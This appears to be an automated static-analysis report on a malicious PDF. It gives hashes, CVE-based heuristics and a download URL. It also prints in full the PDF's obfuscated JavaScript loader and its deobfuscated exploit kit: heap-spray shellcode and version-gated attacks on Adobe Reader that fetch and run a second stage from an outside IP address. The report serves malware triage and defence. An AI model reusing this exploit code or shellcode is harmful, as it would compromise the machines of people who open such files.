Malicious PDF — malware analysis report

Static analysis result for SHA-256 e7ee81a050f0f8f4…

MALICIOUS

PDF

12.2 KB First seen: 2014-04-13
MD5: b2d992bdab11c051472311d3b21f1b3f SHA-1: f18e75c67d59983845caa777f28cd64531ed6ac5 SHA-256: e7ee81a050f0f8f4b6d22a2899b85340af91df62fde3634945f98ec98099ea15
570 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Js.Exploit.HTML-28 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Js.Exploit.HTML-28
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.205.74.23/w.php?f=233&e=3 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x2C2 11553 bytes
SHA-256: f4920b8eb53dcd8a14566061b6e8c1a206369544f485e086eaeec32cc4be2c9d
Detection
ClamAV: Js.Exploit.HTML-28
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
x='e';
arr='51@37@17@56@17@50@25@50@32@32@36@74@7@58@64@50@33@67@19@22@63@63@33@67@37@8@56@12@33@67@19@1@37@8@33@67@26@1@56@12@33@67@56@14@22@12@33@67@22@22@1@37@33@67@63@12@8@24@33@67@12@24@19@36@33@67@19@36@22@24@33@67@24@8@12@24@33@67@26@24@19@36@33@67@1@63@25@8@33@67@26@63@19@36@33@67@22@22@24@19@33@67@63@63@53@36@33@67@1@56@19@36@33@67@24@22@22@8@33@67@22@22@26@12@33@67@19@25@54@8@33@67@25@1@56@56@33@67@37@37@25@24@33@67@36@19@37@37@33@67@12@24@19@36@33@67@8@22@22@24@33@67@22@14@12@63@33@67@26@1@24@63@33@67@19@26@37@36@33@67@54@12@22@12@33@67@56@12@19@1@33@67@1@25@26@1@33@67@56@36@56@14@33@67@1@25@12@8@33@67@19@36@1@63@33@67@22@8@26@1@33@67@26@12@19@36@33@67@26@19@22@1@33@67@37@1@24@22@33@67@19@36@1@63@33@67@54@24@26@63@33@67@37@1@24@22@33@67@8@14@22@22@33@67@12@25@12@14@33@67@23@53@37@8@33@67@8@1@24@22@33@67@53@36@22@22@33@67@36@56@24@37@33@67@22@19@25@24@33@67@26@12@37@54@33@67@8@25@24@19@33@67@24@53@8@36@33@67@53@23@24@22@33@67@56@36@12@24@33@67@22@36@37@25@33@67@26@1@25@37@33@67@1@56@56@63@33@67@1@56@19@36@33@67@24@22@54@12@33@67@63@63@53@53@33@67@24@8@19@36@33@67@19@53@12@36@33@67@56@8@12@63@33@67@1@12@37@37@33@67@24@8@54@12@33@67@53@19@19@36@33@67@53@53@24@22@33@67@24@12@19@36@33@67@24@22@19@36@33@67@23@36@8@1@33@67@1@14@1@56@33@67@56@36@8@22@33@67@23@53@1@22@33@67@63@19@19@36@33@67@19@24@54@24@33@67@24@8@26@53@33@67@26@12@22@22@33@67@14@63@24@22@33@67@37@22@56@36@33@67@63@19@19@36@33@67@19@36@24@19@33@67@63@23@37@26@33@67@1@14@24@1@33@67@14@19@56@19@33@67@37@37@37@37@33@67@56@54@37@37@33@67@56@19@37@14@33@67@24@24@24@24@33@67@24@24@24@24@33@67@1@24@1@19@33@67@12@24@63@23@33@67@37@37@63@19@33@67@24@24@24@24@33@67@1@24@24@24@33@67@8@24@19@22@33@67@1@24@25@14@33@67@19@36@1@1@33@67@19@36@56@8@33@67@25@24@1@56@33@67@8@22@19@22@33@67@37@37@24@1@33@67@63@19@56@22@33@67@63@56@63@37@33@67@24@24@24@24@33@67@26@1@63@19@33@67@63@8@26@54@33@67@1@12@63@53@33@67@25@63@37@37@33@67@8@12@19@22@33@67@19@36@24@19@33@67@56@19@56@19@33@67@37@37@63@25@33@67@37@37@37@37@33@67@24@54@56@36@33@67@26@54@56@36@33@67@56@8@19@25@33@67@24@25@24@12@33@67@24@24@24@24@33@67@1@8@19@53@33@67@24@8@54@12@33@67@24@12@8@26@33@67@26@54@54@12@33@67@63@26@63@1@33@67@8@26@26@22@33@67@54@12@12@12@33@67@26@63@24@12@33@67@22@22@26@54@33@67@8@26@22@54@33@67@54@12@12@12@33@67@54@24@24@19@33@67@26@22@54@53@33@67@1@22@54@24@33@67@37@19@63@19@33@67@24@24@24@24@33@67@37@37@24@24@33@67@24@8@1@63@33@67@56@19@19@36@33@67@8@14@22@22@33@67@8@26@1@25@33@67@25@53@12@12@33@67@26@26@24@24@33@67@63@54@26@24@33@67@8@26@26@12@33@67@25@53@12@12@33@67@54@56@24@1@33@67@63@8@63@12@33@67@8@63@63@8@33@67@25@53@12@12@33@67@24@24@24@14@33@67@19@23@1@14@33@67@24@12@8@25@33@67@19@19@22@24@33@67@25@53@12@12@33@67@12@25@24@12@33@67@63@23@1@25@33@67@63@23@24@24@33@67@1@22@24@24@33@67@63@23@1@26@33@67@37@37@24@24@33@67@25@12@1@63@33@67@8@24@19@1@33@67@25@63@26@1@33@67@24@24@63@23@33@67@37@37@1@22@33@67@24@12@1@63@33@67@24@24@63@23@33@67@56@36@19@22@33@67@1@22@24@8@33@67@1@63@37@37@33@67@19@22@24@12@33@67@24@8@8@22@33@67@24@54@56@36@33@67@25@22@56@36@33@67@19@24@12@26@33@67@24@24@22@37@33@67@37@23@26@1@33@67@19@24@12@26@33@67@24@24@22@37@33@67@8@12@26@1@33@67@24@24@63@23@33@67@37@56@63@23@33@67@1@63@37@37@33@67@56@19@24@19@33@67@37@56@14@8@33@67@37@37@37@37@33@67@12@56@19@56@33@67@56@8@24@56@33@67@37@56@14@19@33@67@24@56@19@23@33@67@63@37@19@14@33@67@36@53@24@25@33@67@8@23@22@22@33@67@1@36@19@23@33@67@8@63@25@36@33@67@26@14@12@63@33@67@25@23@22@63@33@67@26@24@54@37@33@67@26@12@63@19@33@67@26@24@26@12@33@67@54@37@22@23@33@67@22@14@54@37@33@67@54@56@22@25@33@67@22@24@22@54@33@67@54@56@22@1@33@67@22@12@22@26@33@67@22@54@54@56@33@67@54@37@22@22@33@67@54@56@26@26@33@67@63@19@26@24@33@67@22@37@26@24@33@67@22@53@63@63@33@67@22@22@22@54@33@67@54@63@22@22@33@67@22@53@63@1@33@67@24@24@22@22@33@67@24@24@24@24@50@18@37@67@45@8@27@51@11@45@70@56@52@16@69@17@69@23@71@31@61@32@3@21@0@51@72@56@17@69@23@35@72@56@45@58@27@0@62@54@65@31@61@32@3@69@23@66@64@69@23@18@75@69@23@64@69@23@35@7@67@36@7@27@69@51@45@58@17@24@71@31@61@42@54@32@18@69@56@27@67@69@45@70@69@23@18@75@70@37@67@45@8@27@51@11@45@70@36@30@17@32@3@16@23@69@70@53@20@58@64@45@56@21@70@2@69@69@23@61@17@32@18@16@23@69@70@16@21@64@24@30@24@8@24@8@24@8@24@8@18@16@23@69@70@23@53@53@69@64@24@30@12@24@24@24@24@24@18@16@23@69@70@40@23@61@72@11@23@53@64@67@45@56@7@8@23@40@56@17@36@74@7@58@32@18@16@23@69@70@7@8@39@72@56@45@64@40@23@61@72@11@23@53@35@72@56@45@58@27@0@62@54@18@16@23@69@70@31@61@64@23@53@53@69@10@17@7@8@39@72@56@45@66@24@30@22@19@32@18@16@23@69@70@61@23@69@7@40@64@67@45@56@7@8@23@40@56@17@9@33@67@14@24@14@24@33@67@14@24@14@24@9@32@18@61@23@69@7@40@64@56@52@16@69@17@61@23@69@7@40@71@31@61@32@18@16@23@69@70@8@11@67@45@27@54@64@17@16@21@10@24@30@12@24@24@24@24@24@32@42@23@53@53@69@18@37@11@69@17@16@23@69@70@8@11@67@45@27@64@24@18@8@11@67@45@27@65@8@11@67@45@27@54@18@8@11@67@45@27@66@66@32@3@53@20@58@46@8@11@67@45@27@34@64@61@23@69@7@40@66@40@23@61@72@11@23@53@18@75@70@16@23@69@70@11@16@56@69@37@72@11@21@64@67@45@56@7@8@23@40@56@17@9@33@67@24@8@24@8@33@67@24@8@24@8@9@32@18@21@0@51@72@56@17@11@16@56@69@37@72@11@21@35@72@56@45@58@27@0@65@12@12@14@1@54@32@3@11@16@56@69@37@72@11@21@66@64@11@16@56@69@37@72@11@21@18@75@70@27@0@51@7@35@8@11@72@72@23@36@60@27@11@69@56@64@49@11@72@72@23@36@35@8@11@72@72@56@8@27@44@43@23@51@72@29@45@37@11@17@3@7@67@36@74@57@9@9@71@43@7@58@57@11@16@56@69@37@72@11@21@75@32@18@75@70@37@67@45@8@27@51@11@45@70@40@69@51@45@27@37@17@32@3@45@11@40@64@67@45@56@7@8@23@40@56@17@9@33@67@24@2@24@2@33@67@24@2@24@2@33@67@24@2@24@2@33@67@24@2@24@2@9@32@18@16@23@69@70@40@23@61@72@11@23@53@64@67@45@56@7@8@23@40@56@17@36@74@7@58@32@18@0@56@23@40@36@72@11@8@20@64@45@11@40@66@40@23@61@72@11@23@53@18@36@51@58@36@72@11@8@20@64@67@45@56@7@8@23@40@56@17@9@33@67@24@2@24@2@33@67@24@2@24@2@9@32@18@0@56@23@53@56@69@7@51@52@56@64@54@24@18@7@40@69@23@61@64@0@56@23@53@56@69@7@51@52@56@66@0@56@23@40@36@72@11@8@20@35@72@56@45@58@27@0@18@21@0@51@72@56@17@36@51@58@36@72@11@8@20@35@72@56@45@58@27@0@65@7@40@69@23@61@32@3@36@51@58@36@72@11@8@20@66@64@36@51@58@36@72@11@8@20@18@75@70@37@51@72@72@36@72@11@8@20@64@36@51@58@36@72@11@8@20@35@7@67@36@7@27@69@51@45@58@17@24@71@7@40@69@23@61@32@18@36@72@11@8@20@64@36@51@58@36@72@11@8@20@35@7@67@36@7@27@69@51@45@58@17@24@71@36@51@58@36@72@11@8@20@35@72@56@45@58@27@0@10@7@40@69@23@61@32@18@21@0@51@72@56@17@36@72@11@8@20@35@72@56@45@58@27@0@66@7@40@69@23@61@65@24@30@12@24@24@24@24@32@3@36@72@11@8@20@64@36@72@11@8@20@66@36@72@11@8@20@66@37@51@72@72@36@72@11@8@20@18@75@70@43@56@43@64@45@56@21@70@2@69@69@23@61@17@32@18@37@11@69@17@51@64@24@18@51@65@25@12@24@24@18@51@66@66@32@3@43@56@43@46@51@34@64@36@72@11@8@20@66@0@56@23@40@36@72@11@8@20@18@75@70@16@23@69@70@45@67@43@64@25@54@14@14@14@14@14@14@14@14@14@14@14@14@14@14@14@14@14@14@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@19@18@67@27@51@72@35@40@69@51@45@27@37@17@9@33@12@1@24@24@24@37@9@71@45@67@43@32@18@75@70@37@67@45@8@27@51@11@45@70@58@56@27@51@8@11@45@17@32@3@16@23@69@70@23@69@69@61@64@45@56@21@70@2@69@69@23@61@17@32@18@51@37@17@23@40@40@35@53@11@8@35@49@11@72@72@23@36@35@58@56@27@29@8@11@45@32@3@16@23@69@70@40@23@61@72@11@23@53@64@67@45@56@7@8@23@40@56@17@36@74@7@58@32@18@16@23@69@70@0@55@31@1@24@24@49@4@64@40@23@61@72@11@23@53@35@72@56@45@58@27@0@62@54@18@16@23@69@70@31@61@64@24@30@12@24@24@24@24@24@10@17@0@55@31@1@24@24@49@4@66@24@30@22@19@32@18@16@23@69@70@61@23@69@7@40@64@67@45@56@7@8@23@40@56@17@9@33@67@14@24@14@24@33@67@14@24@14@24@9@32@18@61@23@69@7@40@64@56@52@16@69@17@61@23@69@7@40@71@31@61@32@18@16@23@69@70@40@1@2@74@68@63@1@37@64@17@24@30@24@8@24@8@24@8@24@8@10@24@30@12@24@24@24@24@24@32@42@24@30@12@24@24@24@24@24@18@37@11@69@17@16@23@69@70@16@31@8@48@38@14@63@61@64@24@18@16@31@8@48@38@14@63@61@65@40@1@2@74@68@63@1@37@18@16@31@8@48@38@14@63@61@66@66@32@3@23@69@69@61@46@16@31@8@48@38@14@63@61@34@64@61@23@69@7@40@66@40@23@61@72@11@23@53@18@75@70@16@23@69@70@27@5@15@0@4@36@41@21@64@67@45@56@7@8@23@40@56@17@9@33@24@14@9@32@18@21@0@51@72@56@17@27@5@15@0@4@36@41@21@35@72@56@45@58@27@0@65@24@30@12@24@24@24@32@3@27@5@15@0@4@36@41@21@66@64@27@5@15@0@4@36@41@21@18@75@70@27@5@15@0@4@36@41@21@64@9@4@35@9@66@27@5@15@0@4@36@41@21@18@23@40@40@35@53@11@8@35@49@11@72@72@23@36@35@58@56@27@29@8@11@45@17@27@5@15@0@4@36@41@21@32@18@75@75@70@23@47@72@67@58@51@45@7@64@23@40@40@35@40@72@67@58@29@45@7@18@16@23@69@70@7@16@64@40@23@69@7@56@29@45@27@17@23@40@40@35@16@51@56@21@56@69@6@56@69@7@51@11@45@35@27@11@60@27@69@51@45@58@17@32@35@8@0@23@69@2@27@17@24@32@32@18@37@11@69@17@16@23@69@70@51@64@24@18@51@65@23@47@72@67@58@51@45@7@35@72@56@45@58@27@0@18@51@66@66@32@3@51@37@17@23@47@72@67@58@51@45@7@46@51@34@35@45@23@43@56@64@64@50@44@60@8@69@51@40@27@50@32@3@16@23@69@70@72@16@64@23@47@72@67@58@51@45@7@46@51@34@35@16@56@69@7@51@11@45@18@75@75@70@51@37@17@17@72@16@64@64@14@32@73@73@17@17@7@16@64@64@19@32@28@28@17@72@16@65@64@19@35@25@54@32@32@32@3@58@56@27@51@8@11@45@17@32@18@75@56@72@7@56@70@51@37@17@72@16@64@64@26@35@25@32@3@40@69@51@45@27@37@17@32@18@75@56@72@7@56@70@51@37@17@17@17@7@16@64@64@63@32@73@73@17@7@16@64@64@26@32@32@28@28@17@72@16@65@26@35@25@25@32@32@3@36@30@17@32@18@75@56@72@7@56@70@51@37@17@17@72@16@13@64@14@35@25@32@73@73@17@72@16@65@64@14@35@54@32@73@73@17@72@16@13@64@19@35@25@22@32@73@73@17@72@16@65@64@19@35@25@26@32@32@3@37@67@45@8@27@51@11@45@70@23@17@32@3@67@27@51@72@35@40@69@51@45@27@53@17@50@40@59@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@25@70@57@70@61@61@61@61@25@25@25@50@71@45@56@21@70@38@23@27@56@17@32@32@18@75@16@23@69@70@0@64@23@40@40@35@40@72@67@58@29@45@7@18@37@11@69@17@16@23@69@70@37@64@24@18@37@65@0@35@72@56@45@58@27@0@18@37@66@66@32@3@51@37@17@0@46@37@34@35@45@23@43@56@64@64@50@44@60@8@69@51@40@27@50@32@3@16@23@69@70@51@64@0@46@37@34@35@16@56@69@7@51@11@45@18@75@75@70@51@37@17@17@51@13@19@35@25@54@32@28@28@17@51@65@19@35@54@32@32@3@8@64@45@56@21@70@2@69@69@23@61@17@32@18@16@23@69@70@53@64@67@45@56@7@8@23@40@56@17@50@33@67@14@24@14@24@33@67@14@24@14@24@50@32@18@16@23@69@70@56@64@67@45@56@7@8@23@40@56@17@36@74@7@58@32@18@21@0@51@72@56@17@53@35@72@56@45@58@27@0@65@64@24@30@19@24@24@24@32@3@53@66@64@53@18@75@53@64@53@35@7@67@36@7@27@69@17@24@71@24@30@19@24@24@24@10@56@35@72@56@45@58@27@0@32@18@37@11@69@17@37@64@24@18@37@65@54@14@24@24@18@37@66@66@32@3@8@46@37@34@64@53@66@56@18@75@23@17@32@18@23@17@32@18@27@69@61@3@27@0@51@7@35@43@56@53@51@23@35@45@56@21@47@72@23@61@56@69@17@45@67@72@72@32@18@75@8@23@27@8@0@17@56@32@3@75@23@17@32@18@75@75';
cc={q:'h5A{NUVsc"-o4>9Mv(;8kw3a017t&Ixq)%].bfD_pG/mEn[PQC"izd2We:g@Sy*6=<+uKr ,l|j}'}.q;
q=x+'v'+'al';
a=(Date+String).substr(2,3);
aa=([].unshift+[].reverse).substr(2,3);
if (aa==a){
t='3vtwe';
e=t['substr'];
w=e(12)[q];
s=[];
ar=arr.split('@');
n=cc;
for(i=0;i<ar.length;i++){
s[i]=n[ar[i]];
}
if(a===aa)w(s.join(''));
}
split_char_table_stage_000.js deobfuscated-js split character-table join decoded JavaScript at offset 0x2D1 3858 bytes
SHA-256: ec46f900ec5f26b754bab78eb2cd25ae94c0f2e129f25cfbd7fb8154fd930985
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
if(e("1"))bjsg="%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3332%u2633%u3d65%u0033%u0000";function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd("p@111111111111111111111111 : yyyy111",new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=="EScript"){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape("%u9090%u9090");var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.